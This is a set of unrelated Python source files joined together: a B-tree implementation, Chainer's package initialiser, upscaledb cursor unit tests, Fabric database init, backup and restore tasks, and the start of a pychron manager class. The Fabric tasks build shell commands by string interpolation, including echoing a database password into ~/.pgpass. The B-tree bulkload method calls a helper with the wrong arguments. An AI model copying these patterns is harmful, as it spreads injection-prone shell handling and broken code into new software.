# try promoting from the right subtree first,
# but only if it won't have to resize
additional_ancestors = [(self, index + 1)]
descendent = self.children[index + 1]
while descendent.children:
additional_ancestors.append((descendent, 0))
descendent = descendent.children[0]
if len(descendent.contents) > minimum:
ancestors.extend(additional_ancestors)
self.contents[index] = descendent.contents[0]
descendent.remove(0, ancestors)
return
# fall back to the left child
additional_ancestors = [(self, index)]
descendent = self.children[index]
while descendent.children:
additional_ancestors.append(
(descendent, len(descendent.children) - 1))
descendent = descendent.children[-1]
ancestors.extend(additional_ancestors)
self.contents[index] = descendent.contents[-1]
descendent.remove(len(descendent.children) - 1, ancestors)
else:
self.contents.pop(index)
if len(self.contents) < minimum and ancestors:
self.grow(ancestors)
class BTree:
'''
doc
'''
BRANCH = LEAF = _BNode
def __init__(self, order):
'''
doc
'''
self.order = order
self._root = self._bottom = self.LEAF(self)
def _path_to(self, item):
'''
doc
'''
current = self._root
ancestry = []
while getattr(current, "children", None):
index = bisect.bisect_left(current.contents, item)
ancestry.append((current, index))
if index < len(current.contents) \
and current.contents[index] == item:
return ancestry
current = current.children[index]
index = bisect.bisect_left(current.contents, item)
ancestry.append((current, index))
present = index < len(current.contents)
present = present and current.contents[index] == item
return ancestry
def _present(self, item, ancestors):
'''
doc
'''
last, index = ancestors[-1]
return index < len(last.contents) and last.contents[index] == item
def insert(self, item):
'''
doc
'''
current = self._root
ancestors = self._path_to(item)
node, index = ancestors[-1]
while getattr(node, "children", None):
node = node.children[index]
index = bisect.bisect_left(node.contents, item)
ancestors.append((node, index))
node, index = ancestors.pop()
node.insert(index, item, ancestors)
def remove(self, item):
'''
doc
'''
current = self._root
ancestors = self._path_to(item)
if self._present(item, ancestors):
node, index = ancestors.pop()
node.remove(index, ancestors)
else:
raise ValueError("%r not in %s" % (item, self.__class__.__name__))
def __contains__(self, item):
'''
doc
'''
return self._present(item, self._path_to(item))
def __iter__(self):
'''
doc
'''
def _recurse(node):
if node.children:
for child, item in zip(node.children, node.contents):
for child_item in _recurse(child):
yield child_item
yield item
for child_item in _recurse(node.children[-1]):
yield child_item
else:
for item in node.contents:
yield item
for item in _recurse(self._root):
yield item
def compose(self):
'''
doc
'''
return tuple(self._root.compose())
@classmethod
def bulkload(cls, items, order):
'''
doc
'''
tree = object.__new__(cls)
tree.order = order
leaves = tree._build_bulkloaded_leaves(items)
tree._build_bulkloaded_branches(leaves)
return tree
def _build_bulkloaded_leaves(self, items):
'''
doc
'''
minimum = self.order // 2
leaves, seps = [[]], []
for item in items:
if len(leaves[-1]) < self.order:
leaves[-1].append(item)
else:
seps.append(item)
leaves.append([])
if len(leaves[-1]) < minimum and seps:
last_two = leaves[-2] + [seps.pop()] + leaves[-1]
leaves[-2] = last_two[:minimum]
leaves[-1] = last_two[minimum + 1:]
seps.append(last_two[minimum])
return [self.LEAF(self, contents=node) for node in leaves], seps
def _build_bulkloaded_branches(self, leaves, seps):
'''
doc
'''
minimum = self.order // 2
levels = [leaves]
while len(seps) > self.order + 1:
items, nodes, seps = seps, [[]], []
for item in items:
if len(nodes[-1]) < self.order:
nodes[-1].append(item)
else:
seps.append(item)
nodes.append([])
if len(nodes[-1]) < minimum and seps:
last_two = nodes[-2] + [seps.pop()] + nodes[-1]
nodes[-2] = last_two[:minimum]
nodes[-1] = last_two[minimum + 1:]
seps.append(last_two[minimum])
offset = 0
for i, node in enumerate(nodes):
children = levels[-1][offset:offset + len(node) + 1]
nodes[i] = self.BRANCH(self, contents=node, children=children)
offset += len(node) + 1
levels.append(nodes)
self._root = self.BRANCH(self, contents=seps, children=levels[-1])
|
|
from __future__ import absolute_import
import collections
import os
import threading
import warnings as builtin_warnings
import numpy
from chainer import _version
from chainer import backends # NOQA
from chainer import dataset # NOQA
from chainer import datasets # NOQA
from chainer import distributions # NOQA
from chainer import function_hooks # NOQA
from chainer import functions # NOQA
from chainer import graph_optimizations # NOQA
from chainer import initializers # NOQA
from chainer import iterators # NOQA
from chainer import links # NOQA
from chainer import optimizers # NOQA
from chainer import serializers # NOQA
from chainer import training # NOQA
from chainer import variable # NOQA
from chainer import warnings # NOQA
# import class and function
# These functions from backends.cuda are kept for backward compatibility
from chainer._backprop import backward # NOQA
from chainer._runtime_info import print_runtime_info # NOQA
from chainer.backend import get_device # NOQA
from chainer.backend import using_device # NOQA
from chainer.backends.cuda import should_use_cudnn # NOQA
from chainer.backends.cuda import should_use_cudnn_tensor_core # NOQA
from chainer.configuration import config # NOQA
from chainer.configuration import global_config # NOQA
from chainer.configuration import using_config # NOQA
from chainer.device_resident import DeviceResident # NOQA
from chainer.distribution import cross_entropy # NOQA
from chainer.distribution import Distribution # NOQA
from chainer.distribution import kl_divergence # NOQA
from chainer.distribution import register_kl # NOQA
from chainer.function import force_backprop_mode # NOQA
from chainer.function import Function # NOQA
from chainer.function import FunctionAdapter # NOQA
from chainer.function import no_backprop_mode # NOQA
from chainer.function_hook import FunctionHook # NOQA
from chainer.function_node import FunctionNode # NOQA
from chainer.function_node import grad # NOQA
from chainer.functions import array # NOQA
from chainer.functions.math import basic_math # NOQA
from chainer.graph_optimizations.static_graph import static_graph # NOQA
from chainer.graph_optimizations.static_graph_utilities import static_code # NOQA
from chainer.initializer import Initializer # NOQA
from chainer.link import Chain # NOQA
from chainer.link import ChainList # NOQA
from chainer.link import Link # NOQA
from chainer.link_hook import LinkHook # NOQA
from chainer.optimizer import GradientMethod # NOQA
from chainer.optimizer import Optimizer # NOQA
from chainer.optimizer import UpdateRule # NOQA
from chainer.reporter import DictSummary # NOQA
from chainer.reporter import get_current_reporter # NOQA
from chainer.reporter import report # NOQA
from chainer.reporter import report_scope # NOQA
from chainer.reporter import Reporter # NOQA
from chainer.reporter import Summary # NOQA
from chainer.sequential import Sequential # NOQA
from chainer.serializer import AbstractSerializer # NOQA
from chainer.serializer import Deserializer # NOQA
from chainer.serializer import Serializer # NOQA
from chainer.variable import as_array # NOQA
from chainer.variable import as_variable # NOQA
from chainer.variable import Parameter # NOQA
from chainer.variable import Variable # NOQA
# Alias for backward compatibility
from chainer import cuda # NOQA
from chainer import _environment_check
import chainerx
# Introduce an alias that cannot be declared at the original place due to
# circular imports.
import chainer.utils.walker_alias
chainer.utils.WalkerAlias = chainer.utils.walker_alias.WalkerAlias
del chainer
# Check environment conditions
_environment_check.check()
__version__ = _version.__version__
_thread_local = threading.local()
_array_types = None
_cpu_array_types = None
# Used in chainer.FunctionNode.forward_chainerx().
# This value is returned to indicate that the function does not support forward
# computation in ChainerX implementation with given input arrays and other
# arguments.
class _FallbackType(object):
def __repr__(self):
return 'Fallback'
Fallback = _FallbackType()
def get_function_hooks():
try:
ret = _thread_local.function_hooks
except AttributeError:
ret = collections.OrderedDict()
_thread_local.function_hooks = ret
return ret
def _get_link_hooks():
try:
ret = _thread_local.link_hooks
except AttributeError:
ret = collections.OrderedDict()
_thread_local.link_hooks = ret
return ret
def _load_array_types():
# Note: this function may not be protected by GIL because of external
# calls.
global _array_types
global _cpu_array_types
if _array_types is None:
array_types = [numpy.ndarray]
cpu_array_types = [numpy.ndarray]
if backends.cuda.available:
array_types.append(backends.cuda.ndarray)
if backends.intel64.is_ideep_available():
array_types.append(backends.intel64.mdarray)
cpu_array_types.append(backends.intel64.mdarray)
if chainerx.is_available():
array_types.append(chainerx.ndarray)
cpu_array_types.append(chainerx.ndarray)
array_types = tuple(array_types)
cpu_array_types = tuple(cpu_array_types)
_array_types = array_types
_cpu_array_types = cpu_array_types
def get_array_types():
_load_array_types()
return _array_types
def get_cpu_array_types():
_load_array_types()
return _cpu_array_types
# TODO(hvy): Move this function to backend?
def is_arrays_compatible(arrays):
# Do not use this function to check if a single object is an array or
# not. Use isinstance(obj, chainer.get_array_types()) instead.
arrays = [a for a in arrays if a is not None]
if not arrays:
return True
# If there's at least one chainerx.ndarray, all other arrays
# must be chainerx as well
are_chainerx = [isinstance(arr, chainerx.ndarray) for arr in arrays]
if chainerx.is_available() and any(are_chainerx):
return all(are_chainerx)
if isinstance(arrays[0], backends.cuda.ndarray):
types = backends.cuda.ndarray
else:
types = get_cpu_array_types()
return all([isinstance(a, types) for a in arrays])
class _Mixed16(object):
dtype = numpy.dtype(numpy.float16)
def __repr__(self):
return "dtype('mixed16')"
mixed16 = _Mixed16()
"""Dtype-like object that represents 16/32 bits mixed precision float."""
global_config.debug = bool(int(os.environ.get('CHAINER_DEBUG', '0')))
global_config.cudnn_deterministic = False
global_config.warn_nondeterministic = False
global_config.enable_backprop = True
global_config.keep_graph_on_report = bool(int(
os.environ.get('CHAINER_KEEP_GRAPH_ON_REPORT', '0')))
global_config.train = True
global_config.type_check = bool(int(os.environ.get('CHAINER_TYPE_CHECK', '1')))
global_config.use_cudnn = os.environ.get('CHAINER_USE_CUDNN', 'auto')
global_config.use_cudnn_tensor_core = 'auto'
global_config.autotune = False
global_config.schedule_func = None
global_config.use_static_graph = True
global_config.use_ideep = os.environ.get('CHAINER_USE_IDEEP', 'never')
global_config.lazy_grad_sum = bool(int(
os.environ.get('CHAINER_LAZY_GRAD_SUM', '0')))
global_config.cudnn_fast_batch_normalization = bool(int(
os.environ.get('CHAINER_CUDNN_FAST_BATCH_NORMALIZATION', '0')))
_chainer_dtype = os.environ.get('CHAINER_DTYPE', 'float32')
if _chainer_dtype in ('float16', 'float32', 'float64'):
global_config.dtype = numpy.dtype(_chainer_dtype)
elif _chainer_dtype == 'mixed16':
global_config.dtype = mixed16
else:
raise TypeError('incorrect dtype name in CHAINER_DTYPE: "{}". '
'Only float16/32/64 are allowed.'.format(_chainer_dtype))
global_config.in_recomputing = False
global_config._will_recompute = False
global_config.compute_mode = None
def is_debug():
"""Returns if the debug mode is enabled or not in the current thread.
Returns:
bool: ``True`` if the debug mode is enabled.
"""
return bool(config.__getattr__('debug'))
def set_debug(debug):
"""Enables or disables the debug mode in the current thread.
.. note::
``chainer.set_debug(value)`` is equivalent to
``chainer.config.debug = value``.
Args:
debug (bool): New debug mode.
"""
config.debug = debug
class DebugMode(object):
"""Debug mode context.
This class provides a context manager for debug mode. When entering the
context, it sets the debug mode to the value of `debug` parameter with
memorizing its original value. When exiting the context, it sets the debug
mode back to the original value.
.. deprecated:: v2.0.0
Use :func:`chainer.using_config` instead. See :ref:`debug` for details.
Args:
debug (bool): Debug mode used in the context.
"""
def __init__(self, debug):
builtin_warnings.warn(
'chainer.DebugMode is deprecated. '
'Use chainer.using_config("debug", ...) instead.',
DeprecationWarning)
self._using = using_config('debug', debug)
def __enter__(self):
self._using.__enter__()
def __exit__(self, *args):
self._using.__exit__(*args)
def get_dtype(dtype=None, map_mixed16=None):
"""Resolves Chainer's default dtype.
Args:
dtype: Dtype specifier. If this value is specified (not ``None``),
this function returns the dtype object corresponding to it.
map_mixed16: Dtype specifier. When ``chainer.config.dtype`` is mixed16,
this option is used. If this value is ``None``, float16 is used.
Returns:
If ``dtype`` is not ``None``, it returns the dtype normalized by
``numpy.dtype()``. Otherwise, it returns ``chainer.config.dtype`` (see
:ref:`configuration`) normalized as well. When ``chainer.config.dtype``
is :data:`~chainer.mixed16` and ``map_mixed16`` is specified, it
returns the normalized version of ``map_mixed16``.
"""
if dtype is None:
dtype = config.dtype
if dtype is mixed16 and map_mixed16 is not None:
dtype = map_mixed16
return numpy.dtype(dtype)
def get_compute_mode():
return config.compute_mode
basic_math.install_variable_arithmetics()
array.get_item.install_variable_get_item()
disable_experimental_feature_warning = False
|
|
#
# Copyright (C) 2005-2016 Christoph Rupp (chris@crupp.de).
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# See the file COPYING for License information.
#
import unittest
# set the library path, otherwise upscaledb.so/.dll is not found
import os
import sys
import distutils.util
p = distutils.util.get_platform()
ps = ".%s-%s" % (p, sys.version[0:3])
sys.path.insert(0, os.path.join('build', 'lib' + ps))
sys.path.insert(1, os.path.join('..', 'build', 'lib' + ps))
import upscaledb
class CursorTestCase(unittest.TestCase):
def testClone(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
clone = c.clone()
c.close()
clone.close()
db.close()
def testCloneAutoClose(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
clone = c.clone()
c.close()
clone.close()
db.close()
env.close()
def testCloneNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
clone = c.clone(13)
except TypeError:
pass
c.close()
db.close()
env.close()
def testMoveTo(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
c.move_to(upscaledb.UPS_CURSOR_NEXT)
c.move_to(upscaledb.UPS_CURSOR_LAST)
c.close()
db.close()
env.close()
def testMoveToNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
try:
c = upscaledb.cursor()
except TypeError:
pass
try:
c = upscaledb.cursor("blah")
except TypeError:
pass
try:
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
except upscaledb.error, (errno, string):
assert upscaledb.UPS_KEY_NOT_FOUND == errno
c.close()
db.close()
env.close()
def testGetKey(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert "key1" == c.get_key()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert "key2" == c.get_key()
c.move_to(upscaledb.UPS_CURSOR_LAST)
assert "key3" == c.get_key()
c.close()
db.close()
env.close()
def testGetKeyNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.get_key()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
try:
c.get_key(333)
except TypeError:
pass
c.close()
db.close()
env.close()
def testGetRecord(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert "value1" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert "value2" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_LAST)
assert "value3" == c.get_record()
c.close()
db.close()
env.close()
def testGetRecordNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.get_record()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
try:
c.get_record(333)
except TypeError:
pass
c.close()
db.close()
env.close()
def testGetOverwrite(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert "value1" == c.get_record()
c.overwrite("value11");
assert "value11" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert "value2" == c.get_record()
c.overwrite("value22");
assert "value22" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_LAST)
assert "value3" == c.get_record()
c.overwrite("value33");
assert "value33" == c.get_record()
c.close()
db.close()
env.close()
def testGetOverwrite(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.overwrite("asdf")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
try:
c.overwrite(None)
except TypeError:
pass
try:
c.overwrite(33)
except TypeError:
pass
c.close()
db.close()
env.close()
def testFind(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.find("key1")
assert "key1" == c.get_key()
assert "value1" == c.get_record()
c.find("key3")
assert "key3" == c.get_key()
assert "value3" == c.get_record()
c.find("key2")
assert "key2" == c.get_key()
assert "value2" == c.get_record()
c.close()
db.close()
env.close()
def testFindRecno(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_RECORD_NUMBER64)
db.insert(None, 1, "value1")
db.insert(None, 2, "value2")
db.insert(None, 3, "value3")
c = upscaledb.cursor(db)
c.find(1)
assert 1 == c.get_key()
assert "value1" == c.get_record()
try:
c.find("1")
except TypeError:
pass
c.close()
db.close()
env.close()
def testFindNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
try:
c.find("key4")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_KEY_NOT_FOUND == errno
try:
c.find(1)
except TypeError:
pass
try:
c.find()
except TypeError:
pass
c.close()
db.close()
env.close()
def testInsert(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
assert "key1" == c.get_key()
assert "value1" == c.get_record()
c.insert("key3", "value3")
assert "key3" == c.get_key()
assert "value3" == c.get_record()
c.insert("key2", "value2")
assert "key2" == c.get_key()
assert "value2" == c.get_record()
c.close()
db.close()
env.close()
def testInsertRecno(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_RECORD_NUMBER32)
c = upscaledb.cursor(db)
c.insert(1, "value1")
assert 1 == c.get_key()
assert "value1" == c.get_record()
c.insert(2, "value2")
c.insert(3, "value3")
try:
c.insert("1", "blah")
except TypeError:
pass
c.close()
db.close()
env.close()
def testInsertNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.insert(3, "value1")
except TypeError:
pass
try:
c.insert("a", "key2", "value2")
except TypeError:
pass
try:
c.insert()
except TypeError:
pass
try:
c.insert("key1", "value1")
c.insert("key1", "value1")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_DUPLICATE_KEY == errno
c.close()
db.close()
env.close()
def testErase(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
assert "key1" == c.get_key()
assert "value1" == c.get_record()
c.erase()
try:
c.find("key1")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_KEY_NOT_FOUND == errno
c.close()
db.close()
env.close()
def testEraseNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.erase(3)
except TypeError:
pass
try:
c.erase("a", "key2", "value2")
except TypeError:
pass
try:
c.erase()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
c.close()
db.close()
env.close()
def testGetDuplicateCount(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
assert 1 == c.get_duplicate_count()
c.insert("key1", "value2", upscaledb.UPS_DUPLICATE)
assert 2 == c.get_duplicate_count()
c.insert("key1", "value3", upscaledb.UPS_DUPLICATE)
assert 3 == c.get_duplicate_count()
c.erase()
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert 2 == c.get_duplicate_count()
c.close()
db.close()
env.close()
def testGetDuplicatePosition(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
c.insert("key1", "value2", upscaledb.UPS_DUPLICATE)
c.insert("key1", "value3", upscaledb.UPS_DUPLICATE)
c.insert("key1", "value4", upscaledb.UPS_DUPLICATE)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert 0 == c.get_duplicate_position()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 1 == c.get_duplicate_position()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 2 == c.get_duplicate_position()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 3 == c.get_duplicate_position()
c.close()
db.close()
env.close()
def testGetRecordSize(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
c.insert("key1", "v")
c.insert("key2", "va")
c.insert("key3", "val")
c.insert("key4", "valu", upscaledb.UPS_DUPLICATE)
c.insert("key4", "value", upscaledb.UPS_DUPLICATE)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert 1 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 2 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 3 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 4 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 5 == c.get_record_size()
c.close()
db.close()
env.close()
def testGetDuplicateCountNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
try:
c.get_duplicate_count()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
c.insert("key1", "value1")
try:
c.get_key(333)
except TypeError:
pass
try:
c.get_key("asdf")
except TypeError:
pass
c.close()
db.close()
env.close()
unittest.main()
|
|
"""Fabric tasks to automate typical database actions.
There are three DB tasks:
* db.init
* db.backup
* db.restore
To list all available tasks::
fab --list
All tasks makes decision about DB engine given from Django settings and
performs appropriate actions.
Init DB task
------------
Usage::
fab db.init
This task performs following actions:
1. DROP database given from Django settings
2. CREATE new database with name given from Django settings
3. Apply all migrations
4. Load fixture data
5. Deploy FSMs
Backup DB task
--------------
Usage::
fab db.backup[:custom_branch_name]
This task performs following actions:
1. DROP database given from Django settings
2. CREATE new database with name given from Django settings
3. ``psql pg_dump > backup.postgres.custom_branch_name`` action
for PostgreSQL and ``cp mysite.db backup.sqlite.custom_branch_name``
action for SQLite DB.
If ``custom_branch_name`` param is not presented task gets current
git branch name and using it as a custom suffix for backup files.
Restore DB task
---------------
Usage::
fab db.restore[:custom_branch_name]
This task performs following actions:
1. DROP database given from Django settings
2. CREATE new database with name given from Django settings
3. ``psql < backup.postgres.custom_branch_name`` action for
PostgreSQL and ``cp backup.sqlite.custom_branch_name mysite.db``
action for SQLite DB.
If ``custom_branch_name`` param is not presented task get current
git branch name and using it as a suffix for backup files.
If task can not find backup file it will list for you all backup files
available with specific DB engine given from Django settings.
"""
import re
import os
import sys
from fab_settings import env
from fabric.contrib import django
from fabric.api import local, settings, hide, lcd
from fabric.tasks import Task
sys.path.append(os.path.dirname(__file__) + '/../../mysite/')
django.settings_module('mysite.settings')
from django.conf import settings as dj_settings
class BaseTask(Task):
"""
Base class for all DB tasks.
"""
db_cfg = dj_settings.DATABASES['default']
engine = db_cfg.get('ENGINE').split('.')[-1]
base_path = os.path.dirname(__file__) + '/../..'
def run(self, action, suffix=None):
handlers = {
'postgresql_psycopg2': getattr(BaseTask, '%s_db_postgres' % action),
'sqlite3': getattr(BaseTask, '%s_db_sqlite' % action)
}
suffix = suffix or local('git rev-parse --abbrev-ref HEAD', capture=True)
suffix = re.sub(r'/', r'\\\\', suffix)
suffix = re.sub(r'!', r'\\!', suffix)
suffix = re.sub(r'\$', r'U+0024', suffix)
suffix = re.sub(r'`', r'\\`', suffix)
try:
handlers[self.engine].__call__(self, suffix)
except KeyError:
print('Error: Unknown engine `%s`' % self.engine)
def postgres(fn):
"""
Decorator that adds PostgreSQL specific actions to task.
"""
def wrapped(self, *args, **kwargs):
local(
'echo localhost:5432:postgres:%s:%s > ~/.pgpass'
% (self.db_cfg['USER'], self.db_cfg['PASSWORD'])
)
local(
'echo localhost:5432:%s:%s:%s >> ~/.pgpass'
% (self.db_cfg['NAME'], self.db_cfg['USER'], self.db_cfg['PASSWORD'])
)
local('chmod 600 ~/.pgpass')
fn(self, *args, **kwargs)
local('rm ~/.pgpass')
return wrapped
@postgres
def init_db_postgres(self, *args, **kwargs):
"""
Init db to original state for postgres.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local('dropdb %s --username=%s -w ' % (self.db_cfg['NAME'], self.db_cfg['USER']))
local('createdb %s encoding="UTF8" --username=%s -w' % (self.db_cfg['NAME'], self.db_cfg['USER']))
local('%s/bin/python mysite/manage.py migrate' % env.venv_name)
local('%s/bin/python mysite/manage.py loaddata mysite/dumpdata/debug-wo-fsm.json' % env.venv_name)
local('%s/bin/python mysite/manage.py fsm_deploy' % env.venv_name)
def init_db_sqlite(self, *args, **kwargs):
"""
Init db to original state for sqlite.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local('rm %s/mysite.db' % dj_settings.BASE_DIR)
local('%s/bin/python mysite/manage.py migrate' % env.venv_name)
local('%s/bin/python mysite/manage.py loaddata mysite/dumpdata/debug-wo-fsm.json' % env.venv_name)
local('%s/bin/python mysite/manage.py fsm_deploy' % env.venv_name)
@postgres
def backup_db_postgres(self, suffix, *args, **kwargs):
"""
Backup Postgres DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local(
'pg_dump %s -U %s -w > %s/backups/backup.postgres.%s'
% (self.db_cfg['NAME'], self.db_cfg['USER'], self.base_path, suffix)
)
def backup_db_sqlite(self, suffix, *args, **kwargs):
"""
Backup Sqlite DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local(
'cp %s/mysite.db %s/backups/backup.sqlite.%s'
% (dj_settings.BASE_DIR, self.base_path, suffix)
)
@postgres
def restore_db_postgres(self, suffix, *args, **kwargs):
"""
Restore Postgres DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
if not local('ls %s/backups/backup.postgres.%s' % (self.base_path, suffix)).succeeded:
return self.list_backups('postgres')
local('dropdb %s --username=%s -w ' % (self.db_cfg['NAME'], self.db_cfg['USER']))
local(
'createdb %s encoding="UTF8" --username=%s -w'
% (self.db_cfg['NAME'], self.db_cfg['USER'])
)
local(
'psql %s -U %s -w < %s/backups/backup.postgres.%s'
% (self.db_cfg['NAME'], self.db_cfg['USER'], self.base_path, suffix)
)
def restore_db_sqlite(self, suffix, *args, **kwargs):
"""
Restore Sqlite DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
result = local(
'cp %s/backups/backup.sqlite.%s %s/mysite.db'
% (self.base_path, suffix, dj_settings.BASE_DIR)
)
if not result.succeeded:
self.list_backups('sqlite')
@staticmethod
def list_backups(engine):
print('='*32)
print('There is no requested backup file.')
backups = local('ls backups', capture=True).split()
print('Below you can find available backup files:')
for backup in backups:
if re.match(r'^backup\.%s\.' % engine, backup):
print(backup)
class RestoreDBTask(BaseTask):
"""
Restore DB task.
"""
name = 'restore'
action = 'restore'
def run(self, suffix=None):
super(RestoreDBTask, self).run(self.action, suffix)
class BackupDBTask(BaseTask):
"""
Backup db task.
"""
name = 'backup'
action = 'backup'
def run(self, suffix=None):
super(BackupDBTask, self).run(self.action, suffix)
class InitDBTask(BaseTask):
"""
Backup db task.
"""
name = 'init'
action = 'init'
def run(self):
super(InitDBTask, self).run(self.action)
restore = RestoreDBTask()
backup = BackupDBTask()
init = InitDBTask()
|
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import logging
import time
from socket import gethostbyname, gethostname
from threading import Thread
# =============enthought library imports=======================
from apptools.preferences.preference_binding import bind_preference
from pyface.timer.do_later import do_after
from traits.api import Instance, List, Any, Bool, on_trait_change, Str, Int, Dict, File, Float, Enum
from pychron.canvas.canvas_editor import CanvasEditor
from pychron.core.file_listener import FileListener
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.wait.wait_group import WaitGroup
from pychron.envisage.consoleable import Consoleable
from pychron.extraction_line import LOG_LEVEL_NAMES, LOG_LEVELS
from pychron.extraction_line.explanation.extraction_line_explanation import ExtractionLineExplanation
from pychron.extraction_line.extraction_line_canvas import ExtractionLineCanvas
from pychron.extraction_line.graph.extraction_line_graph import ExtractionLineGraph
from pychron.extraction_line.sample_changer import SampleChanger
from pychron.globals import globalv
from pychron.hardware.core.i_core_device import ICoreDevice
from pychron.managers.manager import Manager
from pychron.monitors.system_monitor import SystemMonitor
from pychron.pychron_constants import NULL_STR
class ExtractionLineManager(Manager, Consoleable):
"""
Manager for interacting with the extraction line
contains reference to valve manager, gauge manager and laser manager
"""
canvas = Instance(ExtractionLineCanvas)
canvases = List
plugin_canvases = List
explanation = Instance(ExtractionLineExplanation, ())
monitor = Instance(SystemMonitor)
switch_manager = Any
gauge_manager = Any
cryo_manager = Any
multiplexer_manager = Any
network = Instance(ExtractionLineGraph)
readback_items = List
runscript = None
learner = None
mode = 'normal'
valve_state_frequency = Int
valve_lock_frequency = Int
check_master_owner = Bool
use_network = Bool
